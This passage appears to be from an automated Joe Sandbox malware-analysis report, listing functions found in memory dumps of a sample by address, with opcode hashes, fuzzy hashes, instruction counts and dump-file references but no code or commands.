                                                • Associated: 00000003.00000002.1442903455.00000000016ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443169682.00000000016EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443284841.00000000018A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443303785.00000000018A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_c50000_random(3).jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 94a2059b3e9de637bc2acf9d9ee56b5af80cdb0661032ec0de0d0b88c1ea6f46
                                                • Instruction ID: 1e7dcfa69901aca1f0b7732eefeabaf8da59d25aa5be68e8c7dc183cc49542ee
                                                • Opcode Fuzzy Hash: 94a2059b3e9de637bc2acf9d9ee56b5af80cdb0661032ec0de0d0b88c1ea6f46
                                                • Instruction Fuzzy Hash: 47812F72D14B828BD7148F65C8806F6B7A0FFDA310F14971EE9D657742E7789580DB40
                                                Function 00FC35B0 Relevance: .2, Instructions: 200COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1442412397.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000003.00000002.1442391729.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000134F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442887927.0000000001354000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.0000000001356000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000014DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443169682.00000000016EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443284841.00000000018A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443303785.00000000018A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_c50000_random(3).jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a33c92924c08a2568abaea2fa9addf836ee9318ce6f8522e2e55b5be4f15f826
                                                • Instruction ID: a7dcdbe5de33f504ed437cc7376d04ee461f6d1a3aedcbb8a89146e25ff762da
                                                • Opcode Fuzzy Hash: a33c92924c08a2568abaea2fa9addf836ee9318ce6f8522e2e55b5be4f15f826
                                                • Instruction Fuzzy Hash: 9F616773D083828BD3118F288881B797BA2AFC6354F29C36EF8955B397E7749A41D740
                                                Function 00DE4B60 Relevance: .2, Instructions: 166COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1442412397.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000003.00000002.1442391729.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000134F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442887927.0000000001354000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.0000000001356000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000014DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443169682.00000000016EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443284841.00000000018A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443303785.00000000018A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_c50000_random(3).jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e84a331a65d0f8599dd0621441ef44eeb13a45fe9f04f778356d8f7135792a5b
                                                • Instruction ID: 928272aee30ac94b6d0d51abb23f3a92d05feb257f6057ad15c402b8f799a13d
                                                • Opcode Fuzzy Hash: e84a331a65d0f8599dd0621441ef44eeb13a45fe9f04f778356d8f7135792a5b
                                                • Instruction Fuzzy Hash: B941F273F206280BE35C99699CA926A77D297C4310B4A473DDA96C73C5DC74DD16A3C0
                                                Function 00FDA000 Relevance: .1, Instructions: 122COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1442412397.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000003.00000002.1442391729.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000134F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442887927.0000000001354000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.0000000001356000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000014DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443169682.00000000016EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443284841.00000000018A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443303785.00000000018A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_c50000_random(3).jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                                                • Instruction ID: 57085050aef3db0a9fc42ec6565277fbbbe3b96f2f2a19444f97a4c4bfd638ca
                                                • Opcode Fuzzy Hash: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                                                • Instruction Fuzzy Hash: 4231B4317083194BC714AD6DC4C832AF6D39BD8760F59C63EE589C3394EA719C49A78B
                                                Function 00F0AB2C Relevance: .0, Instructions: 47COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1442412397.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000003.00000002.1442391729.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000134F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442887927.0000000001354000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.0000000001356000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000014DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443169682.00000000016EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443284841.00000000018A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443303785.00000000018A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_c50000_random(3).jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 194b1e9f7992c7b919597fa56089a32913e4a1d6ceb8f728d31f22bf67bf3837
                                                • Instruction ID: e784aabc6dbbc55b338f3e1a4b0cb30dd650ceced4adedb6a8f6f57eff9ec693
                                                • Opcode Fuzzy Hash: 194b1e9f7992c7b919597fa56089a32913e4a1d6ceb8f728d31f22bf67bf3837
                                                • Instruction Fuzzy Hash: 7DF0C273B652390BA360CDB66C002D7B2C3A3C0370F1F8565EC44D7542E934CC4AA6C6
                                                Function 00F0AAC0 Relevance: .0, Instructions: 41COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1442412397.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000003.00000002.1442391729.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000134F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442887927.0000000001354000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.0000000001356000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000014DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443169682.00000000016EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443284841.00000000018A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443303785.00000000018A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_c50000_random(3).jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fe21089785e6a1748e56388996be618063e6c4318fc8050aa5774256bf8bb64f
                                                • Instruction ID: 04e058814555b45ca5d6c37ab53a033197d9e6f11543a63b4be7e0e231af4094
                                                • Opcode Fuzzy Hash: fe21089785e6a1748e56388996be618063e6c4318fc8050aa5774256bf8bb64f
                                                • Instruction Fuzzy Hash: 6DF08C33A20B340B6360CC7A8D05097A2C797C86B0B0FC969ECA0E7206E930EC0656D1
                                                Function 00E39980 Relevance: .0, Instructions: 7COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1442412397.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000003.00000002.1442391729.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000134F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442887927.0000000001354000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.0000000001356000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000014DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443169682.00000000016EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443284841.00000000018A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443303785.00000000018A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_c50000_random(3).jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8184ade00811c6f7f15c7ab60434af655c124de1f152f732883de8fdf93b69af
                                                • Instruction ID: 52b806793a3866855c243bac3f85db16e9b03dd0288637abe5e59f3a0b50b563
                                                • Opcode Fuzzy Hash: 8184ade00811c6f7f15c7ab60434af655c124de1f152f732883de8fdf93b69af
                                                • Instruction Fuzzy Hash: BCB012359402004B9716C934D8711D132B2B3D5300B55D8F8D00349005DB39E002C700
                                                Function 00CB6810 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 344COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1442412397.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000003.00000002.1442391729.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000134F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442887927.0000000001354000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.0000000001356000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000014DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443169682.00000000016EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443284841.00000000018A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443303785.00000000018A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_c50000_random(3).jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: [
                                                • API String ID: 0-784033777
                                                • Opcode ID: b5fc8b9a5ec39edbe1a936de5aa1e8eb091ed8d7c26db85bb8f3fb9aa898a31f
                                                • Instruction ID: cbf9b84164a1c8adeaecf40df9f8be2fb9f48a321cdc5a074f94d500b75c5f5e
                                                • Opcode Fuzzy Hash: b5fc8b9a5ec39edbe1a936de5aa1e8eb091ed8d7c26db85bb8f3fb9aa898a31f
                                                • Instruction Fuzzy Hash: 92B169719083915BDB399A21C8917FBBBE8FF55304F18052EE8E5C6182EB3DCE44A752